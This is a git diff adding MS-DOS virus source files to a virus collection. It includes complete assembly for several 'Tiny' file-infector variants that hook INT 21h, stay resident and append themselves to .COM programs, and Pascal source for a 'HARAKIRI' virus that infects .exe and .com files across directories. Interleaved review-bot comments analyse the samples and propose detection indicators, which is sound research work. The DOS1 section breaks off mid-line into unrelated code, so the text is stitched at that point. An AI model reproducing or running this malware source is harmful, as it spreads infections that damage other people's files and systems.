+ jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + mov al,0 + call lseek + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov al,0 ; Seek to the file beginning + call lseek + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- Concord/QWK O.O1 Beta-7 +; + Origin: Miami Beach BBS - Nijmegen Nl - 080-732083 - ZyX 19K2 (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! 
+; +; +; The MeeO +; +;/m# Allow # multiple passes to resolve forward references +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir23.asm b/MSDOS/Virus.MSDOS.Unknown.vir23.asm new file mode 100644 index 00000000..f1a7ba76 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir23.asm 
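Review bot: The `.radix 16` directive near the top of the listing makes every unsuffixed literal hexadecimal, but nothing in the body reminds the reader, so lines such as `int 32`, `int 21`, `mov ax,4C00` and `org 100` are easy to misread as decimal (decimal 32 would be INT 20h, program terminate, rather than the relocated original INT 21h at vector 32h that `mov di,32*4` sets up). A comment at the first such call, `int 32 ; INT 32h (radix 16): original INT 21h, moved there by vect_cpy`, would prevent that. The markers an analyst will want are likewise only implicit: residency is decided by comparing a single word at 0000:0604h with the virus's own first word (`lodsw`/`scasw` before `je run`), and infected files are tagged with `M` as the fourth byte after the JMP (`db 'M'` and the `stosb` after `mov al,'M'`); both deserve a one-line comment. The same radix convention applies to the TINY-158 listing that follows.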
@@ -0,0 +1,210 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 13 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_158.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Bill Dirks, 2:283/718 (06 Nov 94 16:32) +;* To : Gilbert Holleman +;* Subj : TINY_158.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Bill.Dirks@f718.n283.z2.fidonet.org + page ,132 + name TINY158 + title The 'Tiny' virus, version TINY-158 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-158 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. 
Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. 
point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FastEcho/386 1.41.b7/Real +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/a,/s Alphabetic or Source-code segment ordering +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir24.asm b/MSDOS/Virus.MSDOS.Unknown.vir24.asm new file mode 100644 index 00000000..8a60641a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir24.asm 
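Review bot: The header block (`; The 'Tiny' Virus, version TINY-158` through the MASM re-assembly note) gives an analyst nothing to detect the sample by, although every indicator is visible in the listing: the resident body sits at 0000:0600h (`seg_60 equ 600`, `xor cx,cx / mov es,cx`), the INT 21h vector is redirected there with the original handler parked in the INT 32h slot (`mov di,32*4`, `jmp dword ptr cs:[32*4]`), only EXEC (`cmp ax,4B00`) is intercepted, and an infected .COM starts `E9 xx xx 4D` because the `'M'` is stored as its 4th byte. I would add after the re-assembly note: `; IOC: INT 21h vector -> 0000:06xxh, original INT 21h saved in the INT 32h slot; host .COM begins E9 xx xx 'M'` and `; Skips any file with 'M' in its first 4 bytes (MZ/ZM .EXE headers and already-marked hosts): repne scasb over cx=4`. The residency test is a single-word compare (`lodsw` / `scasw` against 0000:0604h), so presumably any unrelated code leaving that word there makes the virus believe itself resident; worth one sentence, since the same check recurs in the TINY-159 and TINY-167 files of this commit.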
@@ -0,0 +1,210 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 14 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_159.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:32) +;* To : Viral Doctor +;* Subj : TINY_159.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org + page ,132 + name TINY159 + title The 'Tiny' virus, version TINY-159 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-159 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. 
Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + xchg ax,cx + test ax,ax + jz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. 
point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FidoPCB v1.4 [NR] +; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/m# Allow # multiple passes to resolve forward references +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir25.asm b/MSDOS/Virus.MSDOS.Unknown.vir25.asm new file mode 100644 index 00000000..a7221cf7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir25.asm 
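Review bot: Nothing in this file records how TINY-159 differs from the TINY-158 listing added in the same commit, and a side-by-side read shows the only code difference is the vector-copy loop: `vect_cpy` here ends with `xchg ax,cx / test ax,ax / jz vect_cpy`, where TINY-158 pre-loads CX with an `xchg ax,cx` before the label and loops with `jcxz`. A one-line note after the re-assembly remark would save the next reader the diff: `; Differs from TINY-158 only in vect_cpy (test ax,ax / jz instead of the xchg/jcxz pairing); same IOCs: body at 0000:0600h, INT 32h trampoline, host begins E9 xx xx 'M'`. As far as I can trace it the loop exits when the word rotated through CX (the saved INT 21h offset) is non-zero, so an original INT 21h offset of 0 would keep it copying into the INT 22h slot — a curiosity to note in a comment, not something to change.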
@@ -0,0 +1,209 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 15 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_167.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:34) +;* To : Viral Doctor +;* Subj : TINY_167.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org + page ,132 + name TINY167 + title The 'Tiny' virus, version TINY-167 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-167 +; Disassembled by Vesselin Bontchev, July 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + call v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + pop si ; Determine the start addres of the virus body + add si,[si-2] + +; Save the original first 4 bytes of the infected file on the stack: + + push word ptr ds:[si-4] + push word ptr ds:[si-2] + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. 
Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov cl,2 ; The vector is 2 words long + mov ax,int_21-first4+seg_60 ; Offset + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + +vect_cpy: + xchg ax,word ptr es:[di-(32-21)*4] + stosw + mov ax,es ; Segment + loop vect_cpy ; Loop until done + +run: + mov di,offset start ; Point DI at program start + pop ax ; Restore AX + pop word ptr ds:[di+2] ; Restore the original first 4 bytes + pop word ptr ds:[di] ; of the file + push ds ; ES := DS + pop es + jmp di ; Go + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg bx,ax ; Save the file handle in BX + + mov ah,3F ; Read the first 4 bytes of the file + mov cx,4 ; 4 bytes to read + mov dx,seg_60 ; Put them in first4 + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. + + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov ax,4202 ; Seek to the end of file + xor cx,cx + xor dx,dx + int 32 ; Do it + + push ax ; Save file length + + mov dh,6 ; DX = 600h, i.e. 
point it at 0000:0600h + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov ax,4200 ; Seek to the file beginning + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dx,di ; Point DX at first4 + mov al,0E8 ; Near CALL opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the CALL's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov cl,4 ; Overwrite the first 4 bytes of the file + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- PPoint 1.86 +; + Origin: Hard disks never die... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Syntax: TASM [options] source [,object] [,listing] [,xref] +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir26.asm b/MSDOS/Virus.MSDOS.Unknown.vir26.asm new file mode 100644 index 00000000..bbc05131 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir26.asm 
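Review bot: This variant's file-level indicator differs from the other Tiny listings in the commit but the header does not say so: the host's first instruction is a CALL rather than a JMP (`mov al,0E8 ; Near CALL opcode`), so an infected .COM starts `E8 xx xx 4D`, and the entry locates the body from the return address (`pop si / add si,[si-2]`) instead of the `mov si,0FF` arithmetic. I would add after the re-assembly note: `; IOC: host .COM begins E8 xx xx 'M' (CALL, not the E9 of TINY-158/159); body resident at 0000:0600h, original INT 21h moved to the INT 32h slot`. The exit through `jmp di` with `di = offset start` after the two `pop word ptr ds:[di…]` rebuild the first 4 bytes in place also deserves a line, because a reader coming from the `ret`-based dispatch of the sibling files will expect that shape here; and `opperand` should read `operand` in both comments.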
@@ -0,0 +1,200 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 16 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : TINY_138.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Graham Allen, 2:283/718 (06 Nov 94 16:34) +;* To : Fred Lee +;* Subj : TINY_138.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org + page ,132 + name TINY138 + title The 'Tiny' virus, version TINY-138 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-138 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Initialize some registers + mov di,offset start ; Put the addres of program start in DI + mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler + +; The virus will be installed in memory at +; address 0050:0100h (i.e., at segment 60h): + + mov cx,50 + + add si,[si+2] ; Determine the start addres of the virus body + + push di ; Now a Near RET instruction will run the prg. 
+ + movsw ; Restore the original first 4 bytes + movsw + + mov es,cx ; Point ES:DI at 0050:0100h + cmpsb ; Check if the virus is present in memory + jz run ; Just run the program if so + +; Virus not in memory. Install it there: + + dec si ; Correct SI & DI to point at the start of + dec di ; virus code and to destination address + rep movsw ; Move the virus there + + mov es,cx ; ES := 0 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler. +; By the way, now DI == 1A4h (i.e., 69h*4): + + xchg ax,bx ; Thransfer INT 21h vector to INT 69h, + xchg ax,cx ; preserving AX +lp: + xchg ax,cx ; Get a word + xchg ax,es:[di-(69-21)*4] ; Swap the two words + stosw ; Save the word + jcxz lp ; Loop until done (two times) + + xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy) + +run: + push ds ; Restore ES + pop es + ret ; And exit (go to CS:100h) + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push dx + push ds + push es + + mov ax,3D02 ; Open the file for both reading and writting + call do_int21 + jc end_exec ; Exit on error + + cbw ; Zero AH + cwd ; Zero DX + mov bx,si ; Save handle in BX + mov ds,ax ; Set DS and ES to 60h, + mov es,ax ; the virus data segment + + mov ah,3F ; Read the first 4 bytes + int 69 + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + mov al,'M' ; Look for `M' + repne scasb + jz close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek ; SI now contains the file size + + mov cl,v_len ; Length of virus body + int 69 ; Append the virus to the file (AH is now 40h) + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + inc si ; Add 1 to file size for the JMP + xchg ax,si ; Move it in AX + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + xchg ax,dx ; Zero AX + call lseek ; Seek to the beginning + int 69 ; AH is 40h, write the JMP instruction + +close: + mov ah,3E ; Close the file + int 69 + +end_exec: + pop es ; Restore used registers + pop ds + pop dx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[69*4] + +lseek: + mov ah,42 ; Seek operation + cwd ; Zero DX +do_int21: + xor cx,cx ; External entry for Open + int 69 + mov cl,4 ; 4 bytes will be read/written + xchg ax,si ; Store AX in SI + mov ax,4060 ; Prepare AH for Write + xor di,di ; Zero DI + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + +;-+- FMail 0.96 +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/A=NNNN Set NewExe segment alignment factor +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir27.asm b/MSDOS/Virus.MSDOS.Unknown.vir27.asm new file mode 100644 index 00000000..bfbe327d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir27.asm 
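Review bot: The comment on `mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler` is wrong: INT 13h is never touched in this listing; BX holds the offset of the new INT 21h handler, which the `lp:` loop swaps into the INT 21h vector while the old vector is parked in the INT 69h slot (`xchg ax,es:[di-(69-21)*4]`, `jmp dword ptr cs:[69*4]`). Suggested line: `mov bx,int_21-first4+seg_60 ; BX = offset of the new INT 21h handler (old vector goes to INT 69h)`, plus `; Thransfer` → `; Transfer`. A header note that this variant's trampoline is INT 69h, not the INT 32h used by TINY-158/159/167/198 in the same commit, is also worth adding since that is the vector a scanner would check: `; IOC: INT 21h -> 0000:06xxh (body copied to 0050:0100h), original INT 21h saved in the INT 69h slot; host begins E9 xx xx 'M'`.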
@@ -0,0 +1,195 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 17 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : DOS_1.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:35) +;* To : Mark Hapershaw +;* Subj : DOS_1.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org +;DOS1 virus by the TridenT research group - Direct Action appending .COM + +;This virus infects .COM files in the current directory using FCB's. +;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed +;EXE files by using an 'M' at the beginning of files to mark infection. + +;This virus requires a stub file made from the following debug script, +;to make it, compile the virus, then create the stub file by removing the +;semicolons from the code between the lines, saving it, and calling it +;vstub.hex. 
Then use the following commands: + +; Debug '); If Debug then Writeln (Myfile); + + BlockRead(FromF,buf1,SizeOf(buf1),NumRead); + BlockRead(FromF2,buf2,SizeOf(buf2),NumRead); + + j1:=1; + While j1<=Buf_Size do + begin + If Buf1[j1] <> Buf2[j1] then + begin + If Debug then Writeln ('Ej Infekterad....!'); + j1:=10000; + Inc (j1); + Check_file:=True; + end; + Inc (j1); + end; + + If j1>=9999 then + begin + Check_file:=True; + end; + Close (FromF); Close (FromF2); +End; + +{------------------------------------------------------------------} +Procedure Search_4_File (Sdir: String); + +Var + Dir_save : Array[1..100] of string [12]; + I,Imax : Integer; + Mask : String[80]; + Attr : Integer; + Any_File_found : Boolean; + New_F : Boolean; + Antal_Infected : Integer; + +Begin + Antal_Infected:=0; + If Debug then Writeln('Sdir = ' ,Sdir); + Mask := SDir + SearchFile; + Any_File_found := False; + + FindFirst(Mask, $3F, DirInfo); + + I := 0; + + Begin + If DosError=0 then + begin + I := Length( SDir ); + end; + I := 0; + While DosError=0 do + begin + If DirInfo.name[1] <> '.' then + begin + Any_File_found := true; + If Debug then Writeln(Dirinfo.name); + New_F := Check_File (SDir+DirInfo.Name); + If New_F=True then + begin + If Debug then Writeln ('Infecting file'); + Infect_File (Sdir+DirInfo.Name); + Inc (Antal_Infected); + + If Antal_Infected >= 4 then + begin + Writeln ('Program too big to fit in memory'); + Halt; + end; + If Debug then Writeln (Antal_Infected); + end; + If New_F=False then + begin + If Debug then Writeln ('File Already Infected'); + end; + end; + FindNext(DirInfo); + end; {while} + End; + + Mask := Sdir + '*.*'; + FindFirst(Mask, Directory, DirInfo); { look for dir only } + Imax := 0; I:= 1; + + While DosError=0 do { Gr lista ver directories..} + Begin + If DirInfo.Attr and Directory <> 0 then + begin + If DirInfo.name[1] <> '.' 
then + begin + Dir_save[I] := DirInfo.Name; + Imax := I; inc(I); + end; + end; + FindNext(DirInfo); + End; {while} + + I:=1; + While I <= Imax do + begin + Search_4_File(SDir + Dir_save[I] + '\'); + I:= I+1; + end; +End; + +{====Main===================================================================} +BEGIN + Debug := true; + SearchFile := '*.exe'; + Search_4_File ('\'); + SearchFile := '*.com'; + Search_4_File ('\'); + + Writeln ('Your PC is alive and infected with the HARAKIRI virus!'); + +END. + +-+- GoldED/386 2.50.B1016+ + + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/A=NNNN Set NewExe segment alignment factor + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir30.asm b/MSDOS/Virus.MSDOS.Unknown.vir30.asm new file mode 100644 index 00000000..3fa1911d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir30.asm 
